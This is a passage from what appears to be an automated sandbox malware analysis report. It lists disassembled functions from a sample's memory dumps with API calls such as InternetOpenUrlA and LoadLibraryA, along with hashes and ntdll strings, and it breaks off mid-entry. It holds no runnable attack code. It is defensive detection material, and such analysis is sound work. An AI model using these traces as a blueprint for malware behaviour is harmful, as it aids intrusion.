                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c53a9e6d3058dca37beeabd02d44a48c35e66880a6f017140af95933dd167f22
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B131F275B04399DFCF319EA88D647EA3BA9AF29760F84011ADC9CDB301D3709A42CB55
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166A8B0 Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 616 166a8b0-166aacf call 166aa8a CreateFileA
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,-09075E35,-C761E599,-BC93AC97), ref: 0166AAC9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                • Opcode ID: a47c672fd4c8e34cf6fd9033c43b6a70bcc1ca3cb293d94984ecd6f445a9a73c
                                                                                                                                                                                                                                • Instruction ID: 8d81deed99a89a3aaf065d169a0cde31eda3560be8bbc86427c8b3def0848b7e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47c672fd4c8e34cf6fd9033c43b6a70bcc1ca3cb293d94984ecd6f445a9a73c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB21F7F2654289DFCB688E758D69BFA36AA9F58340F90451EEC0AAB240D7308A519B05
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166DB0E Relevance: 1.6, APIs: 1, Instructions: 69libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 623 166db0e-166db2e 625 166db34-166db41 623->625 626 166d5d9-166d686 623->626 628 166d73f-166d74f LoadLibraryA call 166d753 626->628 629 166d68c-166d73d call 166d6ae call 166de34 call 166d753 626->629 629->628
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                • Opcode ID: fc60d92d3f5e881f6d7725fbb5d43ee8094aa3c79a0f1ae080a0465d8fe11e85
                                                                                                                                                                                                                                • Instruction ID: 637fe31268d8ef5ad2c9481e82edbc9648c3b0f1bde5b30b69ac8c3d5833125b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc60d92d3f5e881f6d7725fbb5d43ee8094aa3c79a0f1ae080a0465d8fe11e85
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC21877474034A9FCF30AE98CD647ED3BAAAF65790F544119EC9DD7210D7308A519B11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166D5D9 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                • Opcode ID: fdeb51c3739d3a4bb1f704109385b5d3ce6cc1316f17a469e17b858443a4ebd3
                                                                                                                                                                                                                                • Instruction ID: 962aab3b100f4516eae24d25986fa784c1eb304550bb82391c8ee37d7b8b985f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdeb51c3739d3a4bb1f704109385b5d3ce6cc1316f17a469e17b858443a4ebd3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE019B70B4039EDBCB30AEA98D547ED37ED5F69690F84411ADC9DD7210D7308A028B55
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0166B972 Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 655 166b972-166bf77 call 166b977 call 166db52 LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01662590), ref: 0166BF75
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: d43e9524b3d960df7a749b66b5f8257a27218079c7472daf81f7afc5992c86e3
                                                                                                                                                                                                                                • Instruction ID: c1453f7319ee9b7d02b5677d999ae3e399eb388353b2a63f14666c0d86757753
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d43e9524b3d960df7a749b66b5f8257a27218079c7472daf81f7afc5992c86e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F00155D25C83CA61830296B8580FF1BBFF95E83D4CB2846DEAC901B15BC61B6007E770
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 01670B10 Relevance: 1.5, APIs: 1, Instructions: 45networkCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 661 1670b10-1670c25 666 1670c27-1670c2e 661->666 666->666 667 1670c30-1670cf4 call 1670da8 InternetOpenUrlA 666->667 673 1670d36-1670d42 667->673 674 1670d48-1670d4f 673->674 674->674 675 1670d51-1670d91 674->675
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InternetOpenUrlA.WININET(?,-5B147469,A3E57FEF), ref: 01670CF2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InternetOpen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2038078732-0
                                                                                                                                                                                                                                • Opcode ID: 188c4e9886e387249e5b1775f5302049ca11197d765e1bca873797d01bc7712b
                                                                                                                                                                                                                                • Instruction ID: fa0efc3cf6b1c04927b2a1fbdcbae2ecfc7dfc8e3eb38857e90c436fedcfd36b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 188c4e9886e387249e5b1775f5302049ca11197d765e1bca873797d01bc7712b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C601A271245745CFCB38CE688EC93ED3362AF97344F254626EC468F704D731AA468A21
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 016612A6 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 677 16612a6-16612cd EnumWindows
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnumWindows
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1129996299-0
                                                                                                                                                                                                                                • Opcode ID: 14f8010e2c8e59abf5757123f95fee881161beb2c4ec6395f2bd549c0512ba66
                                                                                                                                                                                                                                • Instruction ID: 252bdcaeadeebd790110c23340d18b388410bacb45602dddd1c89554fef0fc11
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14f8010e2c8e59abf5757123f95fee881161beb2c4ec6395f2bd549c0512ba66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8D022330204088FC736CE50A8483C62710FB80010F684813C218CBA88C230AA0383E0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F202B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 678 1f202b2a-1f202b2f 679 1f202b31-1f202b38 678->679 680 1f202b3f-1f202b46 LdrInitializeThunk 678->680
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 37702d30296142b128db25a2c6b91c5cec5b2f5bdac708b4501c5daf9d5816bb
                                                                                                                                                                                                                                • Instruction ID: 6f3ac22765afe498e5bc9ec26f50284ba4766743bb4d25fdc894b8ca64db2948
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37702d30296142b128db25a2c6b91c5cec5b2f5bdac708b4501c5daf9d5816bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86B09272D064CACAEB01EB604B48B1B7A816BD1701F66C466E2470A85E8778D092F27A
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 1F26FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                • API String ID: 3446177414-1700792311
                                                                                                                                                                                                                                • Opcode ID: f9c27fad175c0777cced30a32e550cb0b5bf4f3713a59eb72e4817739fc57962
                                                                                                                                                                                                                                • Instruction ID: efd1921ff15287930488a8436c200ad459e70cf17fe259416f631fe11917cb70
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9c27fad175c0777cced30a32e550cb0b5bf4f3713a59eb72e4817739fc57962
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03D12439910686EFCB01CFA4C850AEDBBF1FF59320F14824DE8499B652DB39B955CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F29ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 64d110401e7e7dfc601488fc3f93e2a723068bf651acc9e77053b1064c9b9049
                                                                                                                                                                                                                                • Instruction ID: b7d063198f69b4a1f2c3562c1f44b64b8a7b48324b81a112b848d435925e5246
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64d110401e7e7dfc601488fc3f93e2a723068bf651acc9e77053b1064c9b9049
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBF1D872E006669FCF18CF68C9906BDBBF5FF8821076A416DD496DB380E635EA41CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F29A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: HEAP:
                                                                                                                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                                                                                                                • Opcode ID: abd4c2696f8dbcd92dc66ea0dff70085d7bccc2d895b291018dacf1e9cd9e093
                                                                                                                                                                                                                                • Instruction ID: cb5fd2aaa9ae29dec28478de39049fdf8498cf5f321043c685b9cca009a9ec85
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abd4c2696f8dbcd92dc66ea0dff70085d7bccc2d895b291018dacf1e9cd9e093
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84A15771A147228FDB04CE28C894A1AB7E9FF88310F15466DE946DB360E775EC45CF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1F7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1F234507
                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 1F2344AB
                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1F234460
                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1F234530
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1F23454D
                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 1F234592
                                                                                                                                                                                                                                • Execute=1, xrefs: 1F23451E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                • Opcode ID: 008163fe7fc7913fe53a259af499c087f3f01a9921ec90a63327e696b06b1a64
                                                                                                                                                                                                                                • Instruction ID: cbe2d4c00b9b662889666a850003ca455cc41cc77f7a5e9cfd10ad1ce5152ef2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 008163fe7fc7913fe53a259af499c087f3f01a9921ec90a63327e696b06b1a64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22510775A00359AAEF10DBA4DC95FE973A8EF08310F1005E9E905E7190E770BE69CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1DA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F227807
                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F2277E2
                                                                                                                                                                                                                                • SsHd, xrefs: 1F1DA304
                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F2277DD, 1F227802
                                                                                                                                                                                                                                • Actx , xrefs: 1F227819, 1F227880
                                                                                                                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1F2278F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                                                                                                                • Opcode ID: 67a7cddf30b6333abd11e4de334f2fdc0312d20415b1cee80569d9c70cc82734
                                                                                                                                                                                                                                • Instruction ID: f58ff8f7a6c487899cd4c7c1531ab5427ce78318a57054829146166cf124d89f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67a7cddf30b6333abd11e4de334f2fdc0312d20415b1cee80569d9c70cc82734
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4E1F272A083428FD715CE28C99875A7BF1BF85314F150B2DF8A5CB292E735E855CB82
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1DD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • GsHd, xrefs: 1F1DD794
                                                                                                                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F229178
                                                                                                                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1F229372
                                                                                                                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F229153
                                                                                                                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F22914E, 1F229173
                                                                                                                                                                                                                                • Actx , xrefs: 1F229315
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                                                                                                                • Opcode ID: 80168923a09df8b4ccb7439edbd0895a0e4ac1412b33a6c13f37bd0ec7afc1bc
                                                                                                                                                                                                                                • Instruction ID: 2981c7e9845c59e47a3ec41991f59016d3bb205ac12d8ab73ac6a915ccbececd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80168923a09df8b4ccb7439edbd0895a0e4ac1412b33a6c13f37bd0ec7afc1bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6E1DC70A083428FD711CF25C994B9AB7F5BF88358F904A2DF8968B381D771E854CB92
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1B640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 1F1B651C
                                                                                                                                                                                                                                  • Part of subcall function 1F1B6565: RtlDebugPrintTimes.NTDLL ref: 1F1B6614
                                                                                                                                                                                                                                  • Part of subcall function 1F1B6565: RtlDebugPrintTimes.NTDLL ref: 1F1B665F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1F2197B9
                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 1F2197A0, 1F2197C9
                                                                                                                                                                                                                                • apphelp.dll, xrefs: 1F1B6446
                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1F219790
                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1F21977C
                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 1F219783, 1F219796, 1F2197BF
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                                                                                                                • Opcode ID: dc9a4a2075da975d9b1d56c6da3c3599933d758127b9c19437af2710a71371d3
                                                                                                                                                                                                                                • Instruction ID: 979bf47c6ac9518f13d570e5c5df27d602abe8d41bf46fcb99b4e2a76d21e28b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc9a4a2075da975d9b1d56c6da3c3599933d758127b9c19437af2710a71371d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E351BDB56083559FE320CF20C894F9B77E8EF84794F40091DF9869B660EA31A924CB93
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F23FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
